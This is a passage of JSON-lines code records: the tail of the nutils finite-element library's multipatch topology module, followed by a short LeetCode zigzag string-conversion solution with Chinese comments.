len(transposes) != 1 or len(reverses) != 1:\n raise NotImplementedError('patch interfaces must have the same order of axes and the same orientation per axis')\n\n super().__init__(\n util.sum(patch.topo.references for patch in self.patches),\n transformseq.chain([patch.topo.transforms for patch in self.patches], self.patches[0].topo.ndims),\n transformseq.chain([patch.topo.opposites for patch in self.patches], self.patches[0].topo.ndims))\n\n @property\n def _patchinterfaces(self):\n patchinterfaces = {}\n for patch in self.patches:\n for boundary in patch.boundaries:\n patchinterfaces.setdefault(boundary.id, []).append((patch.topo, boundary))\n return {\n boundaryid: tuple(data)\n for boundaryid, data in patchinterfaces.items()\n if len(data) > 1\n }\n\n def getitem(self, key):\n for i in range(len(self.patches)):\n if key == 'patch{}'.format(i):\n return self.patches[i].topo\n else:\n return DisjointUnionTopology(patch.topo.getitem(key) for patch in self.patches)\n\n def basis_spline(self, degree, patchcontinuous=True, knotvalues=None, knotmultiplicities=None, *, continuity=-1):\n '''spline from vertices\n\n Create a spline basis with degree ``degree`` per patch. If\n ``patchcontinuous``` is true the basis is $C^0$-continuous at patch\n interfaces.\n '''\n\n if knotvalues is None:\n knotvalues = {None: None}\n else:\n knotvalues, _knotvalues = {}, knotvalues\n for edge, k in _knotvalues.items():\n if k is None:\n rk = None\n else:\n k = tuple(k)\n rk = k[::-1]\n if edge is None:\n knotvalues[edge] = k\n else:\n l, r = edge\n assert (l,r) not in knotvalues\n assert (r,l) not in knotvalues\n knotvalues[(l,r)] = k\n knotvalues[(r,l)] = rk\n\n if knotmultiplicities is None:\n knotmultiplicities = {None: None}\n else:\n knotmultiplicities, _knotmultiplicities = {}, knotmultiplicities\n for edge, k in _knotmultiplicities.items():\n if k is None:\n rk = None\n else:\n k = tuple(k)\n rk = k[::-1]\n if edge is None:\n knotmultiplicities[edge] = k\n else:\n l, r = edge\n assert (l,r) not in knotmultiplicities\n assert (r,l) not in knotmultiplicities\n knotmultiplicities[(l,r)] = k\n knotmultiplicities[(r,l)] = rk\n\n missing = object()\n\n coeffs = []\n dofmap = []\n dofcount = 0\n commonboundarydofs = {}\n for ipatch, patch in enumerate(self.patches):\n # build structured spline basis on patch `patch.topo`\n patchknotvalues = []\n patchknotmultiplicities = []\n for idim in range(self.ndims):\n left = tuple(0 if j == idim else slice(None) for j in range(self.ndims))\n right = tuple(1 if j == idim else slice(None) for j in range(self.ndims))\n dimknotvalues = set()\n dimknotmultiplicities = set()\n for edge in zip(patch.verts[left].flat, patch.verts[right].flat):\n v = knotvalues.get(edge, knotvalues.get(None, missing))\n m = knotmultiplicities.get(edge, knotmultiplicities.get(None, missing))\n if v is missing:\n raise 'missing edge'\n dimknotvalues.add(v)\n if m is missing:\n raise 'missing edge'\n dimknotmultiplicities.add(m)\n if len(dimknotvalues) != 1:\n raise 'ambiguous knot values for patch {}, dimension {}'.format(ipatch, idim)\n if len(dimknotmultiplicities) != 1:\n raise 'ambiguous knot multiplicities for patch {}, dimension {}'.format(ipatch, idim)\n patchknotvalues.extend(dimknotvalues)\n patchknotmultiplicities.extend(dimknotmultiplicities)\n patchcoeffs, patchdofmap, patchdofcount = patch.topo._basis_spline(degree, knotvalues=patchknotvalues, knotmultiplicities=patchknotmultiplicities, continuity=continuity)\n coeffs.extend(patchcoeffs)\n dofmap.extend(types.frozenarray(dofs+dofcount, copy=False) for dofs in patchdofmap)\n if patchcontinuous:\n # reconstruct multidimensional dof structure\n dofs = dofcount + numpy.arange(numpy.prod(patchdofcount), dtype=int).reshape(patchdofcount)\n for boundary in patch.boundaries:\n # get patch boundary dofs and reorder to canonical form\n boundarydofs = boundary.apply_transform(dofs)[...,0].ravel()\n # append boundary dofs to list (in increasing order, automatic by outer loop and dof increment)\n commonboundarydofs.setdefault(boundary.id, []).append(boundarydofs)\n dofcount += numpy.prod(patchdofcount)\n\n if patchcontinuous:\n # build merge mapping: merge common boundary dofs (from low to high)\n pairs = itertools.chain(*(zip(*dofs) for dofs in commonboundarydofs.values() if len(dofs) > 1))\n merge = numpy.arange(dofcount)\n for dofs in sorted(pairs):\n merge[list(dofs)] = merge[list(dofs)].min()\n assert all(numpy.all(merge[a] == merge[b]) for a, *B in commonboundarydofs.values() for b in B), 'something went wrong is merging interface dofs; this should not have happened'\n # build renumber mapping: renumber remaining dofs consecutively, starting at 0\n remainder, renumber = numpy.unique(merge, return_inverse=True)\n # apply mappings\n dofmap = tuple(types.frozenarray(renumber[v], copy=False) for v in dofmap)\n dofcount = len(remainder)\n\n return function.PlainBasis(coeffs, dofmap, dofcount, self.f_index, self.f_coords)\n\n def basis_patch(self):\n 'degree zero patchwise discontinuous basis'\n\n transforms = transformseq.PlainTransforms(tuple((patch.topo.root,) for patch in self.patches), self.ndims)\n index = function.transforms_index(transforms)\n coords = function.transforms_coords(transforms, self.ndims)\n return function.DiscontBasis([types.frozenarray(1, dtype=int).reshape(1, *(1,)*self.ndims)]*len(self.patches), index, coords)\n\n @property\n def boundary(self):\n 'boundary'\n\n subtopos = []\n subnames = []\n for i, patch in enumerate(self.patches):\n for boundary in patch.boundaries:\n if boundary.id in self._patchinterfaces:\n continue\n name = patch.topo._bnames[boundary.dim][boundary.side]\n subtopos.append(patch.topo.boundary[name])\n subnames.append('patch{}-{}'.format(i, name))\n if len(subtopos) == 0:\n return EmptyTopology(self.ndims-1)\n else:\n return DisjointUnionTopology(subtopos, subnames)\n\n @property\n def interfaces(self):\n '''interfaces\n\n Return a topology with all element interfaces. The patch interfaces are\n accessible via the group ``'interpatch'`` and the interfaces *inside* a\n patch via ``'intrapatch'``.\n '''\n\n intrapatchtopo = EmptyTopology(self.ndims-1) if not self.patches else \\\n DisjointUnionTopology(patch.topo.interfaces for patch in self.patches)\n\n btopos = []\n bconnectivity = []\n for boundaryid, patchdata in self._patchinterfaces.items():\n if len(patchdata) > 2:\n raise ValueError('Cannot create interfaces of multipatch topologies with more than two interface connections.')\n pairs = []\n references = None\n for topo, boundary in patchdata:\n btopo = topo.boundary[topo._bnames[boundary.dim][boundary.side]]\n if references is None:\n references = numeric.asobjvector(btopo.references).reshape(btopo.shape)\n references = references[tuple(_ if i == boundary.dim else slice(None) for i in range(self.ndims))]\n references = boundary.apply_transform(references)[..., 0]\n references = tuple(references.flat)\n transforms = numeric.asobjvector(btopo.transforms).reshape(btopo.shape)\n transforms = transforms[tuple(_ if i == boundary.dim else slice(None) for i in range(self.ndims))]\n transforms = boundary.apply_transform(transforms)[..., 0]\n pairs.append(tuple(transforms.flat))\n # create structured topology of joined element pairs\n references = References.from_iter(references, self.ndims-1)\n transforms, opposites = pairs\n transforms = transformseq.PlainTransforms(transforms, self.ndims-1)\n opposites = transformseq.PlainTransforms(opposites, self.ndims-1)\n btopos.append(Topology(references, transforms, opposites))\n bconnectivity.append(numpy.array(boundaryid).reshape((2,)*(self.ndims-1)))\n # create multipatch topology of interpatch boundaries\n interpatchtopo = MultipatchTopology(tuple(map(Patch, btopos, bconnectivity, self.build_boundarydata(bconnectivity))))\n\n return DisjointUnionTopology((intrapatchtopo, interpatchtopo), ('intrapatch', 'interpatch'))\n\n @property\n def connectivity(self):\n connectivity = []\n patchinterfaces = {}\n for patch in self.patches: # len(connectivity) represents the element offset for the current patch\n ielems = numpy.arange(len(patch.topo)).reshape(patch.topo.shape) + len(connectivity)\n for boundary in patch.boundaries:\n patchinterfaces.setdefault(boundary.id, []).append((boundary.apply_transform(ielems)[...,0], boundary.dim * 2 + (boundary.side == 0)))\n connectivity.extend(patch.topo.connectivity + len(connectivity) * numpy.not_equal(patch.topo.connectivity, -1))\n connectivity = numpy.array(connectivity)\n for patchdata in patchinterfaces.values():\n if len(patchdata) > 2:\n raise ValueError('Cannot create connectivity of multipatch topologies with more than two interface connections.')\n if len(patchdata) == 2:\n (ielem, iedge), (jelem, jedge) = patchdata\n assert ielem.shape == jelem.shape\n assert numpy.equal(connectivity[ielem, iedge], -1).all()\n assert numpy.equal(connectivity[jelem, jedge], -1).all()\n connectivity[ielem, iedge] = jelem\n connectivity[jelem, jedge] = ielem\n return types.frozenarray(connectivity, copy=False)\n\n @property\n def refined(self):\n 'refine'\n\n return MultipatchTopology(Patch(patch.topo.refined, patch.verts, patch.boundaries) for patch in self.patches)\n\n# vim:sw=2:sts=2:et\n","sub_path":"nutils/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":97152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"246233461","text":"def convert(s, numRows):\n answer = ''\n if numRows==1:\n return s\n num = 2 * (numRows - 1) # 每次排列的数字个数\n n = len(s) // num # 能排列的次数\n x = len(s) % num # 余数\n # 第一列\n for a in range(n):\n answer += s[a * num]\n if x >0: #处理余数\n answer +=s[n*num]\n #中间列\n if n==0:\n for b in range(1, numRows - 1):\n if x > 0: # 处理余数\n if x >= b + 1:\n answer += s[n * num + b]\n if x >= num - b + 1:\n answer += s[(n + 1) * num - b]\n for a in range(n):\n for b in range(1,numRows-1):\n answer += s[a*num+b]\n answer += s[(a+1)*num-b]\n if x>0:#处理余数\n if x>=b+1:\n answer += s[n * num + b]\n if x>=num-b+1:\n answer += s[(n+1) * num - b]\n\n #最后列\n for a in range(n):\n answer += s[numRows-1+a * num]\n if x >= numRows: # 处理余数\n answer += s[numRows-1+n * num]\n return answer\n\n\ns = 'AB'\nrows = 3\nprint(convert(s, rows))\n\n","sub_path":"LeetCode/0006/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}